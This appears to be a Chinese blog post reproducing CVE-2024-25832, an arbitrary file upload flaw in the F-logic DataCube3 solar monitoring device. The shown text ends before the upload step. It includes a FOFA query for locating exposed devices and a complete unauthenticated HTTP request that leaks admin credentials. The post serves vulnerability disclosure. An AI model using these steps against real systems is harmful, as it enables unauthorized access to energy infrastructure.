F-logic DataCube3 任意文件上传漏洞复现(CVE-2024-25832)

  • 开发
  • 36

0x01 产品简介

F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统。

0x02 漏洞概述

F-logic DataCube3 /admin/setting_photo.php接口处存在任意文件上传漏洞 ,未经身份验证的攻击者可通过该漏洞在服务器端写入后门,获取服务器权限,进而控制整个web服务器。

0x03 影响范围

F-logic DataCube3测量系统版本1.0

0x04 复现环境

FOFA:title=="DataCube3"

0x05 漏洞复现

未授权获取用户名密码

GET /admin/config_all.php HTTP/1.1
Host: your-ip
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

阅读全部

相关推荐

  4. CVE-2024-0352:Likeshop任意文件漏洞 [附POC]

    2024-03-16 12:50:04       51 阅读

最近更新

  3. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-03-16 12:50:04       98 阅读

  4. Could not load dynamic library ‘cudart64_100.dll‘

    2024-03-16 12:50:04       106 阅读

  9. 在Django里面运行非项目文件

    2024-03-16 12:50:04       87 阅读

  19. Python语言-面向对象

    2024-03-16 12:50:04       96 阅读

  20. 如何分清楚常见的 Git 分支管理策略Git Flow、GitHub Flow 和 GitLab Flow

    2024-03-16 12:50:04       91 阅读

热门阅读

  4. python爬虫

    2024-03-16 12:50:04       43 阅读

  6. 3 数据分析--Numpy

    2024-03-16 12:50:04       32 阅读

  8. C语言实现希尔排序

    2024-03-16 12:50:04       34 阅读

  12. 【Python百日进阶-Web开发-Peewee】Day284 - Peewee 的扩展(三)postgreSQL

    2024-03-16 12:50:04       35 阅读

  17. springboot echarts

    2024-03-16 12:50:04       31 阅读

  21. Sora学习手册

    2024-03-16 12:50:04       90 阅读

  22. 使用vue3编写一个插件

    2024-03-16 12:50:04       42 阅读

  25. Python基础算法解析:K最近邻算法

    2024-03-16 12:50:04       42 阅读

  26. sqlplus登录卡死无响应异常处理

    2024-03-16 12:50:04       42 阅读

  29. 程序分享--排序算法--归并排序

    2024-03-16 12:50:04       45 阅读

  30. GraphQL入门

    2024-03-16 12:50:04       48 阅读